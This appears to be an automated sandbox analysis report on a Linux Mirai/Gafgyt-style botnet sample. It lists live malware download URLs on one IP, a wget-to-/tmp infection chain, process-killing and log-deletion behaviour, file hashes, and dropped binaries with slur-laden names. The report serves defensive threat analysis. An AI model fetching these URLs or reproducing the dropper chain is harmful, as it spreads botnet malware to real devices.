Source: retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6549.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6552.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6558.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6561.1.000055720a30b000.000055720a558000.rw-.sdmpBinary or memory string: rUP!/tmp/ssh-hOQ5FjG2iVgOa/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-At6pzha/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg1/var/lib/emacsen-common/stateOQ5FjG2iVg!/var/lib/python !/tmp/snap.lxdervice-APWQ/var/lib/polkit-1/localauthority/90-mandatory.dP!/tmp/snap.lxd/tmp1/var/lib/emacsen-common/state/flavor!/var/lib/emacsen-commona/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-hostnamed.service-54jvlhq/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-hostnamed.service-54jvlh/tmp.service-54jva/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8estemd-hostnaa/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e/tmp.service!/varqemu-binfmt/arm/tmp1/var/log/installer/block
Source: lol, 6226.1.00007f41f8468000.00007f41f8474000.rw-.sdmpBinary or memory string: $/tmp/vmware-root_721-4290559889
Source: retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6549.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6552.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6558.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6561.1.000055720a30b000.000055720a558000.rw-.sdmpBinary or memory string: qemu-binfmt/arm/tmp1
Source: sh, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6224.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6226.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp, lol, 6228.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6231.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6234.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6262.1.00007ffde835e000.00007ffde837f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
Source: sh, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp, gay, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp, sh, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp, lol, 6228.1.00007f41f8457000.00007f41f8468000.rw-.sdmp, sh, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, gay, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, sh, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6450.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6452.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6454.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6479.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6482.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6486.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6492.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6494.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6496.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6502.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6511.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6513.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: sh, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, gay, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmpBinary or memory string: Enqx86_64/usr/bin/qemu-arm./gay0daySUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./gay
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips./lol0dayT`
Source: retard, 6444.1.00007f1484041000.00007f1484047000.rw-.sdmpBinary or memory string: vmware-root_721-429055988959889

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation1
Scripting		Path Interception1
Masquerading		1
OS Credential Dumping		11
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
File and Directory Permissions Modification		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Indicator Removal		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
File Deletion		LSA SecretsInternet Connection DiscoverySSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417457 Cookbook: defaultlinuxcmdlinecookbook.jbs Startdate: 29/03/2024 Architecture: LINUX Score: 80 86 94.156.8.244, 43120, 43122, 43126 NET1-ASBG Bulgaria 2->86 88 109.202.202.202, 80 INIT7CH Switzerland 2->88 90 5 other IPs or domains 2->90 92 Malicious sample detected (through community Yara rule) 2->92 94 Antivirus detection for dropped file 2->94 96 Machine Learning detection for dropped file 2->96 12 sh 2->12         started        14 gnome-session-binary sh gsd-rfkill 2->14         started        16 systemd systemd-hostnamed 2->16         started        18 2 other processes 2->18 signatures3 process4 process5 20 sh sh 12->20         started        22 sh wget 12->22         started        file6 26 sh retard 20->26         started        29 sh lol 20->29         started        31 sh wget 20->31         started        34 37 other processes 20->34 74 /usr/bin/wtf.sh, ASCII 22->74 dropped 100 Drops files in suspicious directories 22->100 signatures7 process8 file9 108 Sample deletes itself 26->108 36 retard 26->36         started        38 lol 29->38         started        76 /tmp/lol, ELF 31->76 dropped 78 /tmp/what (deleted), ELF 34->78 dropped 80 /tmp/shiteater (deleted), ELF 34->80 dropped 82 /tmp/shit (deleted), ELF 34->82 dropped 84 7 other malicious files 34->84 dropped signatures10 process11 signatures12 41 retard 36->41         started        44 retard 36->44         started        98 Sample tries to kill multiple processes (SIGKILL) 38->98 46 lol 38->46         started        48 lol 38->48         started        process13 signatures14 102 Manipulation of devices in /dev 41->102 104 Deletes system log files 41->104 50 retard 41->50         started        52 retard 41->52         started        54 retard 41->54         started        60 45 other processes 41->60 106 Sample tries to kill multiple processes (SIGKILL) 44->106 56 retard 44->56         started        58 lol 46->58         started        process15 process16 62 retard 56->62         started        64 retard 56->64         started        66 retard 56->66         started        72 2 other processes 56->72 68 lol 58->68         started        70 lol 58->70         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
/tmp/lmao (deleted)100%AviraEXP/ELF.Agent.M.28
/tmp/what (deleted)100%AviraEXP/ELF.Agent.F.118
/tmp/blyat (deleted)100%AviraEXP/ELF.Mirai.W
/tmp/nigga (deleted)100%Joe Sandbox ML
/tmp/faggot (deleted)100%Joe Sandbox ML
/tmp/blyat (deleted)48%VirustotalBrowse
/tmp/faggot (deleted)34%VirustotalBrowse
/tmp/lmao (deleted)33%VirustotalBrowse
/tmp/lol30%VirustotalBrowse
/tmp/nigga (deleted)33%VirustotalBrowse
/tmp/nigger (deleted)38%VirustotalBrowse
/tmp/retard23%VirustotalBrowse
/tmp/shiteater (deleted)44%VirustotalBrowse
/tmp/what (deleted)43%VirustotalBrowse

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://94.156.8.244/powerpc;0%Avira URL Cloudsafe
http://94.156.8.244/armwtf.sh;0%Avira URL Cloudsafe
http://94.156.8.244/arm6;0%Avira URL Cloudsafe
http://94.156.8.244/m68k0%Avira URL Cloudsafe
http://94.156.8.244/sparc;0%Avira URL Cloudsafe
http://94.156.8.244/x86_640%Avira URL Cloudsafe
http://94.156.8.244/i686;0%Avira URL Cloudsafe
http://94.156.8.244/mips0%Avira URL Cloudsafe
http://94.156.8.244/arm6;0%VirustotalBrowse
http://94.156.8.244/sh4;0%Avira URL Cloudsafe
http://94.156.8.244/sparc;0%VirustotalBrowse
http://94.156.8.244/mips22%VirustotalBrowse
http://94.156.8.244/sparc0%Avira URL Cloudsafe
http://94.156.8.244/i686;0%VirustotalBrowse
http://94.156.8.244/powerpc;0%VirustotalBrowse
http://94.156.8.244/mips;0%Avira URL Cloudsafe
http://94.156.8.244/x86_64;0%Avira URL Cloudsafe
http://94.156.8.244/x86_6422%VirustotalBrowse
http://94.156.8.244/arm0%Avira URL Cloudsafe
http://94.156.8.244/powerpc0%Avira URL Cloudsafe
http://94.156.8.244/i5860%Avira URL Cloudsafe
http://94.156.8.244/arm7;0%Avira URL Cloudsafe
http://94.156.8.244/arm22%VirustotalBrowse
http://94.156.8.244/mips;0%VirustotalBrowse
http://94.156.8.244/arm5;0%Avira URL Cloudsafe
http://94.156.8.244/sh4;0%VirustotalBrowse
http://94.156.8.244/powerpc22%VirustotalBrowse
http://94.156.8.244/m68k;0%Avira URL Cloudsafe
http://94.156.8.244/m68k22%VirustotalBrowse
http://94.156.8.244/i58622%VirustotalBrowse
http://94.156.8.244/i586;0%Avira URL Cloudsafe
http://94.156.8.244/sparc20%VirustotalBrowse
http://94.156.8.244/wtf.sh100%Avira URL Cloudmalware
http://94.156.8.244/arm7;0%VirustotalBrowse
http://94.156.8.244/mpsl0%Avira URL Cloudsafe
http://94.156.8.244/mpsl;0%Avira URL Cloudsafe
http://94.156.8.244/arm70%Avira URL Cloudsafe
http://94.156.8.244/x86_64;0%VirustotalBrowse
http://94.156.8.244/wtf.sh23%VirustotalBrowse
http://94.156.8.244/arm60%Avira URL Cloudsafe
http://94.156.8.244/arm50%Avira URL Cloudsafe
http://94.156.8.244/arm;0%Avira URL Cloudsafe
http://94.156.8.244/mpsl22%VirustotalBrowse
http://94.156.8.244/arm722%VirustotalBrowse
http://94.156.8.244/arm5;0%VirustotalBrowse
http://94.156.8.244/sh40%Avira URL Cloudsafe
http://94.156.8.244/m68k;0%VirustotalBrowse
http://94.156.8.244/arm;0%VirustotalBrowse
http://94.156.8.244/i586;0%VirustotalBrowse
http://94.156.8.244/mpsl;0%VirustotalBrowse
http://94.156.8.244/arm622%VirustotalBrowse
http://94.156.8.244/arm522%VirustotalBrowse
http://94.156.8.244/sh422%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
youare.geek
185.216.70.169
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://94.156.8.244/m68kfalse
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/x86_64false
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/mipsfalse
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/sparcfalse
    • 20%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/armfalse
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/powerpcfalse
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/i586false
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/wtf.shfalse
    • 23%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown
    http://94.156.8.244/mpslfalse
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/arm7false
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/arm6false
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/arm5false
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/sh4false
    • 22%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://94.156.8.244/powerpc;wtf.sh.12.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/arm6;wtf.sh.12.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/sparc;wtf.sh.12.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/armwtf.sh;lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/i686;wtf.sh.12.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/sh4;wtf.sh.12.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/mips;wtf.sh.12.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://94.156.8.244/x86_64;wtf.sh.12.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://upx.sf.netlmao (deleted).26.dr, nigga (deleted).77.dr, what (deleted).89.dr, retard.55.dr, lol.16.dr, faggot (deleted).32.dr, nigger (deleted).65.drfalse
      		high
      http://94.156.8.244/arm7;wtf.sh.12.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://94.156.8.244/arm5;wtf.sh.12.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://94.156.8.244/m68k;wtf.sh.12.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://94.156.8.244/i586;wtf.sh.12.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://94.156.8.244/mpsl;wtf.sh.12.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://94.156.8.244/arm;wtf.sh.12.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      185.216.70.168
      		unknownGermany
      		43659CLOUDCOMPUTINGDEfalse
      94.156.8.244
      		unknownBulgaria
      		43561NET1-ASBGfalse
      109.202.202.202
      		unknownSwitzerland
      		13030INIT7CHfalse
      104.168.45.11
      		unknownUnited States
      		36352AS-COLOCROSSINGUSfalse
      91.189.91.43
      		unknownUnited Kingdom
      		41231CANONICAL-ASGBfalse
      91.189.91.42
      		unknownUnited Kingdom
      		41231CANONICAL-ASGBfalse

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      109.202.202.202XIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
        XmztmwSit3.elfGet hashmaliciousUnknownBrowse
          D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
            ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
              arm5.elfGet hashmaliciousMiraiBrowse
                SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
                  cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                    xU378s6kE2.elfGet hashmaliciousMiraiBrowse
                      1IE558rszZ.elfGet hashmaliciousUnknownBrowse
                        nFcIJ8AqNP.elfGet hashmaliciousUnknownBrowse
                          91.189.91.43XIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
                            XmztmwSit3.elfGet hashmaliciousUnknownBrowse
                              D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
                                ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
                                  arm5.elfGet hashmaliciousMiraiBrowse
                                    SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
                                      cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                                        xU378s6kE2.elfGet hashmaliciousMiraiBrowse
                                          1IE558rszZ.elfGet hashmaliciousUnknownBrowse
                                            nFcIJ8AqNP.elfGet hashmaliciousUnknownBrowse
                                              91.189.91.42XIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                XmztmwSit3.elfGet hashmaliciousUnknownBrowse
                                                  D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                    ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      arm5.elfGet hashmaliciousMiraiBrowse
                                                        SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
                                                          cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                                                            xU378s6kE2.elfGet hashmaliciousMiraiBrowse
                                                              1IE558rszZ.elfGet hashmaliciousUnknownBrowse
                                                                nFcIJ8AqNP.elfGet hashmaliciousUnknownBrowse

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CANONICAL-ASGBXIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  XmztmwSit3.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  78mfG4QdNn.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 185.125.190.26
                                                                  mZFiaBnsij.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.125.190.26
                                                                  arm6.elfGet hashmaliciousMiraiBrowse
                                                                  • 185.125.190.26
                                                                  arm5.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                                                                  • 91.189.91.42
                                                                  AS-COLOCROSSINGUShttps://1drv.ms/f/s!AsWd4BQz7qwJa8oeifBH2QA-eNgGet hashmaliciousHTMLPhisherBrowse
                                                                  • 172.245.42.155
                                                                  Document 20240327_1188908_1188909.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                  • 192.3.216.131
                                                                  Q9Jn6b7bIj.elfGet hashmaliciousMiraiBrowse
                                                                  • 107.172.219.213
                                                                  midyear_statement.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                  • 192.3.109.132
                                                                  Specification-Glycyrrhetic Acid 3-O-Glucuronide.exeGet hashmaliciousRemcosBrowse
                                                                  • 172.245.208.13
                                                                  Statement of Account for Past Due Invoices.exeGet hashmaliciousRemcosBrowse
                                                                  • 192.210.201.57
                                                                  RFQ No. 5490490.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                  • 107.175.113.216
                                                                  ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                  • 192.3.216.131
                                                                  https://62.172-245-112-195.cprapid.com/PayPaI/IP:Get hashmaliciousUnknownBrowse
                                                                  • 172.245.112.195
                                                                  PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                                                                  • 198.46.173.145
                                                                  NET1-ASBGfile.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                  • 93.123.39.67
                                                                  rU6YAgkoAw.exeGet hashmaliciousAsyncRATBrowse
                                                                  • 93.123.39.68
                                                                  rU6YAgkoAw.exeGet hashmaliciousUnknownBrowse
                                                                  • 93.123.39.68
                                                                  zWzbBH1Px2.elfGet hashmaliciousMirai, GafgytBrowse
                                                                  • 93.123.85.8
                                                                  cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                                                                  • 93.123.85.8
                                                                  wvp018fajS.elfGet hashmaliciousMirai, GafgytBrowse
                                                                  • 93.123.85.8
                                                                  McYzUs5IoH.elfGet hashmaliciousMirai, GafgytBrowse
                                                                  • 93.123.85.8
                                                                  crhej5yww7.elfGet hashmaliciousMirai, GafgytBrowse
                                                                  • 93.123.85.8
                                                                  amoYv7E7Jr.elfGet hashmaliciousMirai, GafgytBrowse
                                                                  • 93.123.85.8
                                                                  3dooFDrU4S.elfGet hashmaliciousMirai, GafgytBrowse
                                                                  • 93.123.85.8
                                                                  INIT7CHXIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  XmztmwSit3.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  Mcb5K3TOWT.exeGet hashmaliciousUnknownBrowse
                                                                  • 213.144.142.24
                                                                  arm5.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                                                                  • 109.202.202.202
                                                                  xU378s6kE2.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  1IE558rszZ.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  CLOUDCOMPUTINGDEEncryptedPaymentAdviceReference.htmlGet hashmaliciousUnknownBrowse
                                                                  • 185.216.70.216
                                                                  Invoice65952.htmlGet hashmaliciousUnknownBrowse
                                                                  • 185.216.70.216
                                                                  EncryptedPaymentAdviceReference.htmlGet hashmaliciousUnknownBrowse
                                                                  • 185.216.70.216
                                                                  8lrZtcgfOq.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.216.70.192
                                                                  5AWKYnX6nA.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.216.70.192
                                                                  9PaCSKDLNh.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.216.70.192
                                                                  83UF05QvSM.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.216.70.192
                                                                  mqeilsbTER.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.216.70.192
                                                                  537ICRnELO.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.216.70.192
                                                                  kXv1w85Md9.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.216.70.192

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  /tmp/blyat (deleted)

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
                                                                  Category:dropped
                                                                  Size (bytes):83312
                                                                  Entropy (8bit):5.8505401198058555
                                                                  Encrypted:false
                                                                  SSDEEP:1536:E+pS1VZX9KLkprH0sNWFW7cNGtIjMolM57t3vc:fQZ1rUqKGajll8Zvc
                                                                  MD5:4429AEBB64433CA66DCC591F87FACD32
                                                                  SHA1:49EB4E80C62BFF92C3AB7F899B9FB3DF7B655E62
                                                                  SHA-256:2D4AD51286FF92BFB8B338C39C50D135DCEFAFF4C05EFE5A39D00ED37ED4BACB
                                                                  SHA-512:D6B95FE1991BC0C91F94AF7538396B446027C29A3CC382708C1D40E971C818E2B63BDD166FE35C1484933D4241EC0BC4B2BBAD39C2A80BAF6058EBF9542F3E17
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 48%, Browse
                                                                  Reputation:low
                                                                  Preview:.ELF...........................4..C......4. ...(......................9...9...............@...@...@.................dt.Q..............................@..(....@.D...............#.....c...`.....!..... ...@.....".........`......$ ... ...@...........`.......`...`....... ...........!... ..,c...........................`...`..............!.......c...........`...............`............................................#.....X...\...Z...@......#......!L....@.;...........@."U......?....... .................@."L......?....... .........@.:....@.".....@.#F.. .@.:... ...c... ..............`...c...@.......@....... ... ..............) ...@............... ............... ...@.....0....!.....#.. ....!..#...`... ....#.$#...`... ....%.$`...`... ....'.$`...`... ....).$`...`... ....+.$`...`... ....-.$`...`... ..../.$`..$`.........@.#... ...`... ......$#.@."... ...`... ......$`.@."... ...`... ......$`.@.".. ...`... ......$`.@.".. ...`... ......$`.@.".. ...`... ......$`.@.".. ...`... .

                                                                  /tmp/faggot (deleted)

                                                                  Download File
                                                                  Process:/usr/bin/wget
                                                                  File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                                                                  Category:dropped
                                                                  Size (bytes):36188
